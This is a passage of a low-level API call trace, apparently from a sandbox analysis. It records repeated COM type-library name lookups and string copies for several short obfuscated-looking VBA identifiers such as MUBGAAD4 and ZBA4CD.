ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61396, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MUBGAAD4") returned 9 [0068.879] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="MUBGAAD4", lHashVal=0x10dbe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.879] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61396, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MUBGAAD4") returned 9 [0068.879] ITypeComp:RemoteBind (in: This=0x665bd30, szName="MUBGAAD4", lHashVal=0x10dbe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="MUBGAAD4") returned 0x10dbe6 [0068.880] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="MUBGAAD4" | out: _Dst="MUBGAAD4") returned 0x0 [0068.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="MUBGAAD4") returned 9 [0068.880] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.880] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="MUBGAAD4", lHashVal=0x10dbe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.880] IUnknown:Release (This=0x665ba50) returned 0xd [0068.880] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.880] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="MUBGAAD4", lHashVal=0x10dbe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.880] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.880] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.880] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="MUBGAAD4", lHashVal=0x10dbe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.880] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.880] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.880] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="MUBGAAD4", lHashVal=0x10dbe6, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.880] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61396, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="MUBGAAD4") returned 9 [0068.880] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="MUBGAAD4", lHashVal=0x10dbe6, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.880] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.880] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a61396 | out: _Dst=0x67c2d40) returned 0x0 [0068.880] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_MUBGAAD4") returned 0x10b36f [0068.880] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_MUBGAAD4" | out: _Dst="_B_var_MUBGAAD4") returned 0x0 [0068.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_MUBGAAD4") returned 16 [0068.880] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.880] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_MUBGAAD4", lHashVal=0x10b36f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.880] IUnknown:Release (This=0x665ba50) returned 0xd [0068.880] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.880] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_MUBGAAD4", lHashVal=0x10b36f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.880] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.880] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.880] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_MUBGAAD4", lHashVal=0x10b36f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.880] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.881] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.881] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_MUBGAAD4", lHashVal=0x10b36f, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.881] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.881] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.881] IUnknown:Release (This=0x665ba50) returned 0xd [0068.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2dda, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_MUBGAAD4") returned 16 [0068.881] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_MUBGAAD4", lHashVal=0x10b36f, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x4d005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.881] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61396 | out: _Dst=0x144ec0) returned 0x0 [0068.881] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZBA4CD") returned 7 [0068.881] ITypeComp:RemoteBind (in: This=0x665ba60, szName="ZBA4CD", lHashVal=0x10da8e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZBA4CD") returned 7 [0068.881] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="ZBA4CD", lHashVal=0x10da8e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZBA4CD") returned 7 [0068.881] ITypeComp:RemoteBind (in: This=0x665bd30, szName="ZBA4CD", lHashVal=0x10da8e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.881] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ZBA4CD") returned 0x10da8e [0068.881] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="ZBA4CD" | out: _Dst="ZBA4CD") returned 0x0 [0068.881] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="ZBA4CD") returned 7 [0068.881] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.881] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="ZBA4CD", lHashVal=0x10da8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.881] IUnknown:Release (This=0x665ba50) returned 0xd [0068.881] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.881] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="ZBA4CD", lHashVal=0x10da8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.881] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.881] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.881] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="ZBA4CD", lHashVal=0x10da8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.882] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.882] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.882] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="ZBA4CD", lHashVal=0x10da8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.882] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="ZBA4CD") returned 7 [0068.882] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="ZBA4CD", lHashVal=0x10da8e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.882] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.882] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a613c2 | out: _Dst=0x67c2d40) returned 0x0 [0068.882] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_ZBA4CD") returned 0x1054f8 [0068.882] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_ZBA4CD" | out: _Dst="_B_var_ZBA4CD") returned 0x0 [0068.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_ZBA4CD") returned 14 [0068.882] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.882] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_ZBA4CD", lHashVal=0x1054f8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.882] IUnknown:Release (This=0x665ba50) returned 0xd [0068.882] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.882] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_ZBA4CD", lHashVal=0x1054f8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.882] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.882] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.882] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_ZBA4CD", lHashVal=0x1054f8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.882] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.882] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.882] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_ZBA4CD", lHashVal=0x1054f8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.882] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.882] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.882] IUnknown:Release (This=0x665ba50) returned 0xd [0068.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2e0a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_ZBA4CD") returned 14 [0068.882] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_ZBA4CD", lHashVal=0x1054f8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x43003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x5a005f00720061, ppTypeComp=0x43003400000000, pDummy=0x0) returned 0x0 [0068.882] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a613c2 | out: _Dst=0x144ec0) returned 0x0 [0068.882] ITypeComp:RemoteBind (in: This=0x665ba60, szName="cUACwD", lHashVal=0x10f7ea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUACwD") returned 7 [0068.883] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="cUACwD", lHashVal=0x10f7ea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUACwD") returned 7 [0068.883] ITypeComp:RemoteBind (in: This=0x665bd30, szName="cUACwD", lHashVal=0x10f7ea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="cUACwD") returned 0x10f7ea [0068.883] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="cUACwD" | out: _Dst="cUACwD") returned 0x0 [0068.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="cUACwD") returned 7 [0068.883] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.883] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="cUACwD", lHashVal=0x10f7ea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.883] IUnknown:Release (This=0x665ba50) returned 0xd [0068.883] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.883] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="cUACwD", lHashVal=0x10f7ea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.883] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.883] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.883] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="cUACwD", lHashVal=0x10f7ea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.883] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.883] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.883] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="cUACwD", lHashVal=0x10f7ea, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.883] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a613ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="cUACwD") returned 7 [0068.883] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="cUACwD", lHashVal=0x10f7ea, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.883] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.883] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a613ea | out: _Dst=0x67c2d40) returned 0x0 [0068.883] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_cUACwD") returned 0x107254 [0068.883] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_cUACwD" | out: _Dst="_B_var_cUACwD") returned 0x0 [0068.883] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_cUACwD") returned 14 [0068.883] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.883] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_cUACwD", lHashVal=0x107254, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.883] IUnknown:Release (This=0x665ba50) returned 0xd [0068.883] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.884] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_cUACwD", lHashVal=0x107254, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.884] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.884] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.884] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_cUACwD", lHashVal=0x107254, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.884] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.884] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.884] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_cUACwD", lHashVal=0x107254, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.884] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.884] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.884] IUnknown:Release (This=0x665ba50) returned 0xd [0068.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc2e3a, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_cUACwD") returned 14 [0068.884] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_cUACwD", lHashVal=0x107254, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x63005f00720061, ppTypeComp=0x77004300000000, pDummy=0x0) returned 0x0 [0068.884] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a613ea | out: _Dst=0x144ec0) returned 0x0 [0068.884] ITypeComp:RemoteBind (in: This=0x665ba60, szName="d4BUQ4", lHashVal=0x106478, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6143a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="d4BUQ4") returned 7 [0068.884] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="d4BUQ4", lHashVal=0x106478, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6143a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="d4BUQ4") returned 7 [0068.884] ITypeComp:RemoteBind (in: This=0x665bd30, szName="d4BUQ4", lHashVal=0x106478, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.884] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="d4BUQ4") returned 0x106478 [0068.884] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="d4BUQ4" | out: _Dst="d4BUQ4") returned 0x0 [0068.884] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="d4BUQ4") returned 7 [0068.884] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.884] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="d4BUQ4", lHashVal=0x106478, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.884] IUnknown:Release (This=0x665ba50) returned 0xd [0068.884] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.884] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="d4BUQ4", lHashVal=0x106478, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.884] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.884] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.885] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="d4BUQ4", lHashVal=0x106478, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.885] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.885] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.885] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="d4BUQ4", lHashVal=0x106478, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.885] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6143a, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="d4BUQ4") returned 7 [0068.885] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="d4BUQ4", lHashVal=0x106478, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.885] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0068.885] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6143a | out: _Dst=0x67c2d40) returned 0x0 [0068.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_d4BUQ4") returned 0x10df21 [0068.885] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_d4BUQ4" | out: _Dst="_B_var_d4BUQ4") returned 0x0 [0068.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_d4BUQ4") returned 14 [0068.885] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.885] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_d4BUQ4", lHashVal=0x10df21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.885] IUnknown:Release (This=0x665ba50) returned 0xd [0068.885] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.885] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_d4BUQ4", lHashVal=0x10df21, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.885] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.885] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.885] ITypeLib:RemoteIsName (in: 